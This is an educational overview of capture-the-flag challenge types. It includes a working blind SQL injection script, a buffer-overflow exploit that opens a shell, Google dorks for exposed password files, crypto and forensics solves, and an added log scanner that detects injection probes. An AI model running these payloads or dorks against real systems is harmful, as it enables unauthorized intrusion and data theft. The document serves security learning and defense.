Capture The Flag: A Complete Guide to Challenge Types

💡 CTF fact: Modern CTFs cover 7 main challenge categories of varying complexity, ranging from web to hardware hacking!

7 Types of CTF Challenges (+ Example Solutions)

1. Web Exploitation

Common vulnerabilities: SQLi, XSS, CSRF, SSRF, RCE, File Inclusion

Tools: Burp Suite, OWASP ZAP, sqlmap, Postman

# Time-based SQL injection example
import time

import requests

url = "http://ctf.example.com/search?query="
chars = "abcdef0123456789{}_"
flag = ""

# Test each position of the value one character at a time
for i in range(1,30):
  for c in chars:
    payload = f"admin' AND IF(SUBSTR((SELECT password FROM users LIMIT 1),{i},1)='{c}',SLEEP(3),0)--"
    start = time.time()
    requests.get(url + payload)
    # A response delayed by more than 3 seconds means the guess was correct
    if time.time() - start > 3:
      flag += c
      print(f"Found: {flag}")
      break

Advanced techniques: Second-Order SQLi, Blind XXE, SSTI (Server-Side Template Injection)
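
From the defender's side, the time-based probing shown above leaves a recognizable trail in web server access logs. The following is an added example, not part of the original article: it scans log lines for delay-function payloads and reports which character positions each client probed. The log lines, IP addresses and the function name `find_timing_probes` are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format), not from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2025:10:00:01 +0000] "GET /search?query=admin%27+AND+IF(SUBSTR((SELECT+password+FROM+users+LIMIT+1),1,1)=%27a%27,SLEEP(3),0)-- HTTP/1.1" 200 512
203.0.113.7 - - [10/Mar/2025:10:00:02 +0000] "GET /search?query=admin%27+AND+IF(SUBSTR((SELECT+password+FROM+users+LIMIT+1),1,1)=%27b%27,SLEEP(3),0)-- HTTP/1.1" 200 512
203.0.113.7 - - [10/Mar/2025:10:00:06 +0000] "GET /search?query=admin%27+AND+IF(SUBSTR((SELECT+password+FROM+users+LIMIT+1),2,1)=%27a%27,SLEEP(3),0)-- HTTP/1.1" 200 512
198.51.100.4 - - [10/Mar/2025:10:00:07 +0000] "GET /search?query=sleep+tracker+reviews HTTP/1.1" 200 2048
198.51.100.4 - - [10/Mar/2025:10:00:09 +0000] "GET /search?query=ctf+writeups HTTP/1.1" 200 1830
"""

# Client IP and request target from one combined-log-format line.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"')
# Delay primitives used by time-based injection; a call needs "(", so the word "sleep" alone is ignored.
DELAY = re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.I)
# SUBSTR(expr, position, 1): the position shows how far the enumeration has progressed.
PROBE = re.compile(r"\bsubstr(?:ing)?\s*\(.*?,\s*(\d+)\s*,\s*1\s*\)", re.I)


def find_timing_probes(log_text, min_hits=3):
    """Return {client_ip: sorted probed positions} for clients with >= min_hits delay payloads."""
    hits = defaultdict(int)
    positions = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, target = m.group(1), unquote_plus(m.group(2))
        if not DELAY.search(target):
            continue
        hits[ip] += 1
        pos = PROBE.search(target)
        if pos:
            positions[ip].add(int(pos.group(1)))
    return {ip: sorted(positions[ip]) for ip, n in hits.items() if n >= min_hits}


if __name__ == "__main__":
    for ip, probed in find_timing_probes(SAMPLE_LOG).items():
        print(f"{ip}: delay-based probing, positions {probed}")
```

Detection of this kind complements parameterized queries, which remove the injection point itself.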

2. Cryptography

Challenge types: Classical ciphers, RSA flaws, AES ECB weakness, Hash collisions

Tools: CyberChef, RsaCtfTool, Hashcat, SageMath

# Crack RSA with a small modulus (n < 256 bits)
from Crypto.Util.number import long_to_bytes
from factordb.factordb import FactorDB

n = 742449129124467073921545687640895127535705902454369756401331
e = 65537
c = 39207274348578481322317340648475596807303160111338236677373

f = FactorDB(n)
f.connect()
factors = f.get_factor_list()
p, q = factors

phi = (p-1)*(q-1)
d = pow(e, -1, phi)
plain = pow(c, d, n)
print(long_to_bytes(plain)) # Output: b'FLAG{s1mpl3_rs4}'

Common vulnerabilities: Padding oracle, Nonce reuse, Weak PRNG, Homomorphic encryption flaws

3. Reverse Engineering

Target: ELF binaries, Windows PE, Android APK, .NET assemblies

Tools: Ghidra, IDA Pro, radare2, Binary Ninja

// Key function analysis with Ghidra
void check_flag(char *input) {
  char encrypted[32] = {0x12, 0x45, 0x78, ...};
  for (int i = 0; i < 32; i++) {
    if ((input[i] ^ 0x55) != encrypted[i]) {
      puts("Wrong flag!");
      exit(0);
    }
  }
  puts("Correct flag!");
}

# Python solution:
encrypted = [0x12, 0x45, 0x78, ...]
print(''.join([chr(c ^ 0x55) for c in encrypted]))
# Output: FLAG{x0r_r3v3rs1ng}

Advanced techniques: Anti-debugging bypass, Unpacking malware, ARM Thumb mode analysis

4. Forensics

File types: PCAP, memory dumps, disk images, steganography

Tools: Wireshark, Volatility, binwalk, steghide

# Extract hidden data from an image
$ binwalk -e suspicious_image.jpg
$ strings image.jpg | grep "FLAG{"
$ steghide extract -sf image.jpg -p "password123"

# Analyze a PCAP for data exfiltration
$ tshark -r traffic.pcap -Y 'http.request.method == "POST"' -T fields -e urlencoded-form.value
$ tshark -r traffic.pcap -Y 'dns.qry.name contains "flag"'

Special techniques: File carving, Metadata analysis, LSB steganography, USB traffic reconstruction

5. Binary Exploitation (Pwn)

Vulnerabilities: Buffer overflow, ROP, Format string, Heap exploitation

Tools: pwntools, gdb-peda, ROPgadget, one_gadget

# Simple buffer overflow exploit example
from pwn import *

elf = context.binary = ELF('./vuln_program')
p = process()

offset = 72
payload = flat(
  b'A'*offset,
  elf.sym['win'] # Address of the win() function
)

p.sendline(payload)
p.interactive() # Got a shell!

Key concepts: ASLR bypass, Canary bypass, GOT overwrite, House of Force

6. OSINT (Open Source Intelligence)

Focus: Digital investigation, Geolocation, Metadata analysis

Tools: Maltego, theHarvester, exiftool, Google Dorks

# Google dorking to find sensitive information
site:example.com ext:pdf "confidential"
intitle:"index of" "backup"
filetype:sql "password"

# Image metadata analysis
$ exiftool suspect_image.jpg
$ strings image.jpg | grep -i "copyright"

Data sources: WHOIS records, Wayback Machine, Social media footprints

7. Miscellaneous

Challenge variations: Programming puzzles, Math problems, AI challenges

Examples: Maze solving, SAT solving, Blockchain analysis

# Programming challenge solution (prime factorization)
from sympy import factorint

def solve(n):
  factors = factorint(n)
  return ' '.join(f'{p}^{e}' for p,e in factors.items())

print(solve(123456789)) # Output: 3^2 3607^1 3803^1

Special categories: Hardware hacking, IoT security, Side-channel attacks

Challenge-Solving Strategy

🔍 Initial Analysis

  • Read the description carefully
  • Identify the challenge type
  • Check all related files

🛠️ Exploration

  • Use the relevant tools
  • Test different approaches
  • Document your findings

🎯 Exploitation

  • Develop a payload
  • Automate the process
  • Verify the results

📚 Learning Resources

  • LiveOverflow (YouTube): Binary exploitation tutorials
  • CTF Field Guide (GitBook): Comprehensive guide
  • CTFtime.org: Global CTF competition schedule
  • PicoCTF: Learning platform for beginners
